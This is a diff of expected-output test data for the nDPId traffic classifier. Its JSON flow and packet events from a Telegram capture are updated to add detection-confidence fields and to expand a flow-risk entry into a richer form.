 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEWYkAAEAR97nAqAFNW2wMBVqGAgsAMMZE3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/VYJzCLkR9XA=="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEZqwAAEAR5prAqAFNW2wQAVqGAg8AMLyJ3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/9u+DapRNA5DQ=="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEMZgAAEARH6\/AqAFNW2wMAVqGAhgAMB7S3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8nsGAWUhbrUA=="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABECJIAAEARTK7AqAFNW2wICFqGAhoAMJgJ3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8HjiXC2fxIoA=="}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEVZYAAEAR963AqAFNW2wQBFqGAhoAMGBV3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8kkP6VHClAVg=="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1588779616070,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1588779616070,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcvxJAADMRYxZbbAgHwKgBTQIJWoYASDvF3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcBg2rJeKPlGESYBovAAAAAAAAAAAAAA\/\/9XC83DXdwAAA=="}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1588779616076,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1588779616076,"pkt":"KDc3AG3IEBMx8Tl2CABFAABc0gJAADMRUCVbbAgIwKgBTQIaWoYASCPC3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcBg2rJeB44lwtn8SKAAAAAAAAAAAAAA\/\/9XC83DXdwAAA=="}
 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1588779616161,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1588779616161,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcHlxAADQR\/s5bbAwFwKgBTQILWoYASFH93EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcBg2rJe1WCcwi5EfVwAAAAAAAAAAAAA\/\/9XC83DXdwAAA=="}
@@ -112,78 +112,78 @@
 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1588779617174,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"ts_msec":1588779617174,"pkt":"8KNaMBgSKDc3AG3ICABFAABsqlYAAEARTFnAqAFNwKgBNFqGevgAWLgQjfykZ0OTWbVGSN3cMHZvNB3RufFF5FIV8MQ0P3KjKgWFEWl4FO4hV\/puQOILS4RjUor87I6iIoOnx\/A9NueumG+cX0HrNbBHt0bLwMXSB9A="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779617174,"flow_last_seen":1588779617174,"flow_idle_time":180000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1588779617174,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1588779617174,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"ts_msec":1588779617174,"pkt":"EBMx8Tl2KDc3AG3ICABFAABs\/QcAAEARlrXAqAFNVwvNw1qG7TMAWH9So7C\/sNzcuk+cyiR2EyU9Q\/nbaTxTjDBemDeFTsb5lNpyEwlgOlPEUd9m7ay58cjORIuAWP8IcwSg0vb1EIxOrmmqeB4nTaYDWzAgf8R5\/bQ="}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779617174,"flow_last_seen":1588779617174,"flow_idle_time":180000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1588779617174,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779617174,"flow_last_seen":1588779617174,"flow_idle_time":180000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1588779617174,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1588779617350,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"ts_msec":1588779617350,"pkt":"KDc3AG3I8KNaMBgSCABFAABsUAUAAEARpqrAqAE0wKgBTXr4WoYAWLDM6Td5ePjQrnTyke2EPHu3iQJhxLIf06esu8RwrHmFIT7cHf5ycIamk2yhxwjAfE09exZIgAEDzMDiso7KFMuIe8fjwzyyS3MKiG+Cd3eNuy0="}
 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1588779617856,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"ts_msec":1588779617856,"pkt":"KDc3AG3I8KNaMBgSCABFAABsRZ4AAEARsRHAqAE0wKgBTXr4WoYAWPxjToIQs5m5XoZB1qDehmfhJomQUeopOlZuJIIaL6qE8BgtmXQ6sqxHJAacGMTU5S5RgUjUPrOpUP\/aPObI3ORz5PRGJjnynufzdcsxdb\/ZTPY="}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1588779618677,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1588779618677,"pkt":"EBMx8Tl2KDc3AG3ICABFAABMg0kAAEAREJTAqAFNVwvNw1qG7TMAOE0OU2RiXNjy8sJRKs8KhnTyEy6Nhnt95vQlharNkBkXr2lvtMgl2dlHhYY4WvPjXQkp"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779619914,"flow_last_seen":1588779619914,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1588779619914,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1588779619914,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1588779619914,"pkt":"EBMx8Tl2KDc3AG3ICABFAABHqTUAAEARTdLAqAFNwKgBAbgXADUAM25TALgBAAABAAAAAAAAA3d3dxFnb29nbGV0YWdzZXJ2aWNlcwNjb20AAAEAAQ=="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779619914,"flow_last_seen":1588779619914,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1588779619914,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"www.googletagservices.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779619914,"flow_last_seen":1588779619914,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1588779619914,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"www.googletagservices.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1588779619916,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1588779619916,"pkt":"KDc3AG3IAICPmq69CABFAABXwqhAAEAR9E7AqAEBwKgBTQA1uBcAQ5UvALiBgAABAAEAAAAAA3d3dxFnb29nbGV0YWdzZXJ2aWNlcwNjb20AAAEAAcAMAAEAAQAAAAAABMCoAZ0="}
-00771{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":390,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779619914,"flow_last_seen":1588779619916,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1588779619916,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"www.googletagservices.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"192.168.1.157"}}
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":390,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779619914,"flow_last_seen":1588779619916,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1588779619916,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"www.googletagservices.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"192.168.1.157"}}
 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":435,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1588779617174,"flow_last_seen":1588779621221,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":5232,"flow_avg_l4_payload_len":163,"midstream":0,"ts_msec":1588779621221,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.52","src_port":23174,"dst_port":31480,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1588779625981,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00924{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1588779625981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":397,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":397,"pkt_l4_len":363,"ts_msec":1588779625981,"pkt":"\/\/\/\/\/\/\/\/AICPmq69CABFAAF\/jrEAAEAR6r0AAAAA\/\/\/\/\/wBEAEMBa16\/AQEGAN7JmyKFuQAAAAAAAAAAAAAAAAAAAAAAAACAj5quvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBPRP\/j5quvQABAAEfyzfOuCfrPQjbUAB0AQE5AgXcPC1kaGNwY2QtNi4xMC4xOkxpbnV4LTQuOS41Ny12Nys6YXJtdjdsOkJDTTI4MzUMDHBpMy5udG9wLm9yZ5EBATcPAXkhAwYMDxocKjM2Ojt3\/w=="}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1588779625981,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1588779625981,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
